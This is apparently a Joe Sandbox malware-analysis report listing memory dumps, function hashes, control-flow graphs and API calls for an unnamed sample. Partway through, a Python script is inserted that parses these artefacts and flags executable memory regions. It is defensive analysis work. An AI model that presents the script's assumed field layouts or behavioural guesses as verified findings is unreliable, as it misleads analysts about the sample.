                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tw
                                                                              • API String ID: 0-3303754386
                                                                              • Opcode ID: 534721f5ee8e614046e152136bd376070cfe8581f56e7668fd6a2baac1f14f0c
                                                                              • Instruction ID: 85608c3de3cbb8a51359c9d3180f5b8d842c98b4b71af04ebceb8467df3e8f7b
                                                                              • Opcode Fuzzy Hash: 534721f5ee8e614046e152136bd376070cfe8581f56e7668fd6a2baac1f14f0c
                                                                              • Instruction Fuzzy Hash: B021337661D3408FD724CF24C8E136BFBF6EBD5304F25982CE69253281CAB5D9008B06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 36b025b891b2ecedcfcdda3e021beae27d7882bd7bf1659d50fb1967960f0f33
                                                                              • Instruction ID: 005d5952adc8153fe01232b4c52ec64848a9dd0acb37ca7c22c96ffe20b9b278
                                                                              • Opcode Fuzzy Hash: 36b025b891b2ecedcfcdda3e021beae27d7882bd7bf1659d50fb1967960f0f33
                                                                              • Instruction Fuzzy Hash: 055146352083048FD725AF24D855B2BFBE5EB81300F15C83CD585CB3AAEB359C958B81

                                                                              Control-flow Graph (basic blocks with their successor edges; "call" marks an intra-module callee)
                                                                              • 403: 36e3d0-36e3e5 -> 404, 405, 406, 407
                                                                              • 404: 36e456-36e45f call 36bab0 -> 415
                                                                              • 405: 36e3ec-36e3f3 -> 404, 406
                                                                              • 406: 36e3fa-36e40b -> 409
                                                                              • 407: 36e44b-36e454 call 36ba10 -> 414
                                                                              • 409: 36e410-36e434 -> 409 (self-loop), 413
                                                                              • 413: 36e436-36e449 RtlReAllocateHeap -> 415
                                                                              • 414: 36e464-36e467
                                                                              • 415: 36e461 -> 414
                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0036E443
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID: ,X_P$1X_P
                                                                              • API String ID: 1279760036-2502780324
                                                                              • Opcode ID: 3d7175c035ac896ba67a3b77ab903c079d0076ecf8f0fe797197733acb743def
                                                                              • Instruction ID: 430881e617b6dbb0f6fb52f2c4be5fecafab877b48dfee0f1eea44ed1724cb02
                                                                              • Opcode Fuzzy Hash: 3d7175c035ac896ba67a3b77ab903c079d0076ecf8f0fe797197733acb743def
                                                                              • Instruction Fuzzy Hash: C60168B47042019BD3165B35FC9172BBFDA9FC5310F18C538E68147609E635985AC792

                                                                              Control-flow Graph (basic blocks with their successor edges)
                                                                              • 580: 36bab0-36bac1 -> 581, 582
                                                                              • 581: 36bb61-36bb68
                                                                              • 582: 36bac8-36badb -> 583
                                                                              • 583: 36bae0-36bb4a -> 583 (self-loop), 584
                                                                              • 584: 36bb4c-36bb5b RtlFreeHeap -> 581
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0036BB5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 67fec34487c23aa77cbef9e5c6ab33087cc732f9e22efb9178b4286aa8b2d11d
                                                                              • Instruction ID: 2452df3167965c77cf5c2cb3011481f8945ecffd9e85eda93f3eb4e7488fcea2
                                                                              • Opcode Fuzzy Hash: 67fec34487c23aa77cbef9e5c6ab33087cc732f9e22efb9178b4286aa8b2d11d
                                                                              • Instruction Fuzzy Hash: 5F11EF722593099BC728AE99DCC67A3B7F6DF80308F14013ED6C24A351E178491ED740

                                                                              Control-flow Graph (single basic block)
                                                                              • 585: 33cec3-33cef2 CoInitializeSecurity
                                                                              APIs
                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0033CED6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeSecurity
                                                                              • String ID:
                                                                              • API String ID: 640775948-0
                                                                              • Opcode ID: a2a54e8cf20504fe7fb23c5ec63e29efa2495fdd308cf17b6a55e4b09fb41cce
                                                                              • Instruction ID: cf21d8013e4e2c8e84ec22b709989101f4b6836012012a6e372384787082b2e2
                                                                              • Opcode Fuzzy Hash: a2a54e8cf20504fe7fb23c5ec63e29efa2495fdd308cf17b6a55e4b09fb41cce
                                                                              • Instruction Fuzzy Hash: FDD012353E4701BAF13D86189C63F652209A702F90F341A08B326FE2D1CAD07111550C
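As an added example (not part of this report and not Joe Sandbox's own tooling), a small Python parser for the three per-function artefact formats shown in these entries: the "APIs" call lines, the raw `control_flow_graph` line the report emits for each function, and the `.sdmp` memory-dump names. The inputs embedded below are copied from the entries above for the functions at 0x36e3d0 and 0x33cec3. Two things are assumptions rather than documented facts: the field layout of the dump names (only the base-address and protection fields are read, because their values line up with the report's "Offset: 00330000" regions and with the Win32 PAGE_* constants), and that the nine positional arguments of CoInitializeSecurity are in the documented parameter order.

```python
"""Added example: parse Joe Sandbox per-function artefacts (API call lines,
control_flow_graph lines, .sdmp dump names). Not part of the report."""
import re

# "Name.MODULE(arg,...), ref: 0033CED6" as printed in the report's "APIs" lists.
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")

# Exact Win32 values: RPC_C_AUTHN_LEVEL_*, RPC_C_IMP_LEVEL_*, PAGE_*.
AUTHN_LEVEL = {0: "DEFAULT", 1: "NONE", 2: "CONNECT", 3: "CALL", 4: "PKT", 5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
IMP_LEVEL = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY", 3: "IMPERSONATE", 4: "DELEGATE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def parse_api_line(line):
    """'?' marks an argument the sandbox could not resolve; it becomes None."""
    m = API_RE.match(line.strip())
    if not m:
        raise ValueError("not an API line: %r" % line)
    raw = m["args"].split(",") if m["args"] else []
    return {"name": m["name"], "module": m["module"], "ref": int(m["ref"], 16),
            "args": [None if a == "?" else int(a, 16) for a in raw]}


def decode_coinitializesecurity(call):
    """Assumes the documented parameter order: pSecDesc, cAuthSvc, asAuthSvc, pReserved1,
    dwAuthnLevel, dwImpLevel, pAuthList, dwCapabilities, pReserved3."""
    if call["name"] != "CoInitializeSecurity" or len(call["args"]) != 9:
        raise ValueError("not a CoInitializeSecurity call with nine arguments")
    authn, imp, caps = call["args"][4], call["args"][5], call["args"][7]
    return {"authn_level": AUTHN_LEVEL.get(authn, "unknown(%r)" % authn),
            "imp_level": IMP_LEVEL.get(imp, "unknown(%r)" % imp),
            "capabilities": caps,
            # DEFAULT + IMPERSONATE + EOAC_NONE is the combination the documented WMI
            # client example uses; a weak hint that the function sets up a WMI query.
            "matches_wmi_client_init": (authn, imp, caps) == (0, 3, 0)}


def parse_cfg(line):
    """After 'control_flow_graph' the tokens are, per block, <id> <start[-end]> and an
    optional 'call <hex>' or <ApiName>, interleaved with <id>-><id> edges. The address
    is read positionally, so an all-digit address is never taken for a block id."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges, i = {}, [], 1
    while i < len(toks):
        e = EDGE_RE.match(toks[i])
        if e:
            edges.append((int(e[1]), int(e[2])))
            i += 1
            continue
        nid = int(toks[i])
        lo, _, hi = toks[i + 1].partition("-")
        node = {"start": int(lo, 16), "end": int(hi or lo, 16), "call": None, "api": None}
        i += 2
        if i < len(toks) and toks[i] == "call":
            node["call"], i = int(toks[i + 1], 16), i + 2
        elif i < len(toks) and IDENT_RE.match(toks[i]):
            node["api"], i = toks[i], i + 1
        nodes[nid] = node
    return nodes, edges


def cfg_summary(nodes, edges):
    """Lowest-address block (the entry for a normal function), callees, blocks that hit
    an API, and self-looping blocks (tight copy/decrypt loops show up as a->a edges)."""
    entry = min(nodes, key=lambda n: nodes[n]["start"])
    return {"entry": nodes[entry]["start"],
            "callees": sorted(n["call"] for n in nodes.values() if n["call"] is not None),
            "api_blocks": {n["api"]: nid for nid, n in nodes.items() if n["api"]},
            "self_loops": sorted(a for a, b in edges if a == b),
            "block_count": len(nodes), "edge_count": len(edges)}


def parse_dump_name(name):
    """Assumption: fields are <process index>.<stage>.<unique id>.<base>.<protection>...;
    only base and protection are interpreted, the remaining fields are left alone."""
    f = re.sub(r"\.sdmp$", "", name).split(".")
    if len(f) < 5:
        raise ValueError("unexpected dump name: %r" % name)
    base, prot = int(f[3], 16), int(f[4], 16)
    return {"process": int(f[0]), "stage": int(f[1]), "base": base, "protect": prot,
            "protect_name": PAGE_PROTECT.get(prot, hex(prot)),
            "writable_and_executable": prot in (0x40, 0x80)}


def rwx_regions(names):
    """Base addresses of dumped regions that were both writable and executable."""
    return [hex(d["base"]) for d in map(parse_dump_name, names) if d["writable_and_executable"]]


# Constructed inputs, copied from this report's entries for 0x36e3d0 and 0x33cec3.
CFG_36E3D0 = ("control_flow_graph 403 36e3d0-36e3e5 404 36e456-36e45f call 36bab0 403->404 405 36e3ec-36e3f3 "
              "403->405 406 36e3fa-36e40b 403->406 407 36e44b-36e454 call 36ba10 403->407 415 36e461 404->415 "
              "405->404 405->406 409 36e410-36e434 406->409 414 36e464-36e467 407->414 409->409 "
              "413 36e436-36e449 RtlReAllocateHeap 409->413 413->415 415->414")
API_LINES = ["RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0036E443",
             "CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,"
             "00000000,00000000,00000000), ref: 0033CED6"]
DUMP_NAMES = ["00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp",
              "00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp",
              "00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp"]

if __name__ == "__main__":
    print(cfg_summary(*parse_cfg(CFG_36E3D0)))
    for call in map(parse_api_line, API_LINES):
        print(call["name"], call["module"], hex(call["ref"]), call["args"])
        if call["name"] == "CoInitializeSecurity":
            print(decode_coinitializesecurity(call))
    print("RWX regions:", rwx_regions(DUMP_NAMES))
```

Run on the inputs above, the CFG parser recovers nine blocks and thirteen edges for 0x36e3d0, the self-loop on block 409 immediately before the RtlReAllocateHeap block, and the two callees 0x36ba10 and 0x36bab0 (the latter being the RtlFreeHeap wrapper listed in the next entry). The CoInitializeSecurity decode yields RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE and EOAC_NONE, which is the initialization the documented WMI client example uses; the cAuthSvc value 0xFF is left uninterpreted. The dump-name parser flags the 0x331000 and 0x629000 regions as writable-and-executable, the kind of region worth dumping first when looking for unpacked code.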
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TZp@$vB_}$Gm}$O{k$[?X$_~$;x
                                                                              • API String ID: 0-4174716500
                                                                              • Opcode ID: d486a56644727ed7f570309f5c046ef49cf116518be67f88c9c77d2fd709259b
                                                                              • Instruction ID: 1756d2643a78231b066f3db9271d9f3c128713ee124a807a13f64855b666c2c4
                                                                              • Opcode Fuzzy Hash: d486a56644727ed7f570309f5c046ef49cf116518be67f88c9c77d2fd709259b
                                                                              • Instruction Fuzzy Hash: 0AB2E6F360C2049FE7046E2DEC8577ABBE9EF94720F1A493DE6C5C3744EA3598018696
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: 8Y=$<$9($[ F:$bbsx$gjen$'
• API String ID: 0-1020086844
• Opcode ID: 65d546872f297432187b5b5a5e2d7249e56b3a305a610c5fc1d92679ba0f491d
• Instruction ID: 1519986a6aacb4f4801a655073f2db61cca36774b82d8618aa3937e4a801f22d
• Opcode Fuzzy Hash: 65d546872f297432187b5b5a5e2d7249e56b3a305a610c5fc1d92679ba0f491d
• Instruction Fuzzy Hash: 5572E571604B418FC73ACF39C490B16BBE2BF96314B198A6DD4E68B7A2D735E409CB50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: 21$6$;9$QyFg$m+a)$|/.-
• API String ID: 0-3893809079
• Opcode ID: b4e657aa01535980581eda9de157db93b281fce7bad5a0bc86366c7baf40fff1
• Instruction ID: 05b914ce66b22f22417a242751d6fc3254d76e2bac9d0fcd5fd124764237fb3e
• Opcode Fuzzy Hash: b4e657aa01535980581eda9de157db93b281fce7bad5a0bc86366c7baf40fff1
• Instruction Fuzzy Hash: C10232B1210B01CFD3368F25D895B97BBF5BB45314F108A2DD6AB8BAA0DB74A445CF90
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: /PUR$8C76D044CA0F3E1063CFCF7E6C45F838$LO$V\^R$W _,$s
• API String ID: 0-2765564004
• Opcode ID: 905213744aa96d353680a5e62343e31bc3e9f41753faad9e9f38c48aebea7a14
• Instruction ID: 5c30f12f56b60cc34e03a6deb291b64f1745e1b80ae3df6de6d3b5450aa7118a
• Opcode Fuzzy Hash: 905213744aa96d353680a5e62343e31bc3e9f41753faad9e9f38c48aebea7a14
• Instruction Fuzzy Hash: 26C101B06487808FD714DF65C89576BBBE2EFD1304F18892CE5D18B2A1DB79850ACB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: 6Nc$;}$=Bxg$?no$G{~
• API String ID: 0-1899548723
• Opcode ID: 99c9dedcda1af415f2d33eda28585887db783b06d1c23558fa0185616de28489
• Instruction ID: b085ad3fc4fbec3cb61130a2378ee9644cbc4f198c197e65e82058a133c2fe13
• Opcode Fuzzy Hash: 99c9dedcda1af415f2d33eda28585887db783b06d1c23558fa0185616de28489
• Instruction Fuzzy Hash: 88B219F360C204AFE304AE2DEC8567AFBE9EF94720F1A453DEAC583744E63558058697
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: *$Bi$KQ$LC$US$]/[
• API String ID: 0-74086816
• Opcode ID: bf88b93114b812cc84e812c5bf42b78c9d1a8f4a7b393f9ab719439722f83b3d
• Instruction ID: 336bd5876194023427a55a8af4207b1dc57359874f9d599859f45bb7af6461a5
• Opcode Fuzzy Hash: bf88b93114b812cc84e812c5bf42b78c9d1a8f4a7b393f9ab719439722f83b3d
• Instruction Fuzzy Hash: 12C121B264C3948BD325CF2594D136FFBE1ABC2744F19892CE5DA4B342DB758806CB92
Strings
Memory Dump Source
